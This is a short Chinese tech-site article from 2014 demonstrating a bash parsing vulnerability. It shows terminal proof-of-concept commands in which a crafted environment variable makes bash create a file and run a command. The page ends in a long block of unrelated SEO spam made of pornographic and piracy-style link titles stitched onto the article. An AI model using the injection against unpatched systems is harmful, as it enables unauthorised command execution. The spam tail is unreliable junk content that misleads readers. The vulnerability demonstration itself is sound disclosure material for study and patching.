《電子技術應用》
您所在的位置:首頁 > 嵌入式技術 > 設計應用 > 一個linux下的bash安全漏洞
一個linux下的bash安全漏洞
摘要:
關鍵詞: bash 09 2014 2713 david davidcchen
Abstract:
Key words :

 1. 通過設置一個特殊的環境變量的env,能間接地查到到linux命令的屬性,如下:

  [2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

  ls: cannot access date: No such file or directory

  [2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  [2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

  -rw-rw-r--. 1 david david 0 Sep 27 13:01 date

  [2014-09-27 13:01:27 david@davidcchen ~]$

  2. 一次運行環境變量。

  [2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

  zsh 4.3.10 (x86_64-redhat-linux-gnu)

  [2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

  GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

  Copyright (C) 2009 Free Software Foundation, Inc.

  License GPLv3+: GNU GPL version 3 or later

  This is free software; you are free to change and redistribute it.

  There is NO WARRANTY, to the extent permitted by law.

  [2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c "echo date"; cat echo; rm echo

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  Sat Sep 27 13:03:52 CST 2014

  ---------->成功運行date命令

此內容為AET網站原創,未經授權禁止轉載。
主站蜘蛛池模板: 国产一区二区三区四| 国产裸模视频免费区无码| 久久国产乱子伦精品免| 欧美大黑帍在线播放| 亚洲黄色在线电影| 精品无码国产AV一区二区三区| 国产伦精品一区二区三区四区| 婷婷综合激情网| 国产精品美女久久久免费| 99视频免费播放| 好男人资源免费手机在线观看 | 色伊人国产高清在线| 国产在线观看午夜不卡| 国产在线精品香蕉麻豆| 国产精品v片在线观看不卡| 67194在线午夜亚洲| 国语自产精品视频在线看| freexxxx性女hd性中国| 成+人+黄+色+免费观看| 中文字幕亚洲综合久久| 无码免费一区二区三区免费播放| 久久国产中文字幕| 日本高清无卡码一区二区久久| 久久超碰97人人做人人爱| 最近最新中文字幕2018 | 久久精品国产99国产精品澳门 | 日本爆乳片手机在线播放| 久在线精品视频| 日韩高清第一页| 久久这里只精品热免费99| 最新中文字幕在线资源| 亚洲av无码一区二区二三区| 欧洲美女与动zozo| 亚洲va久久久噜噜噜久久狠狠 | 欧美丰满白嫩bbw激情| 国产漂亮白嫩的美女| 亚洲色图五月天| 国产欧美久久久精品影院| 欧美日韩亚洲成色二本道三区 | 亚洲变态另类一区二区三区| 欧美怡红院免费全视频|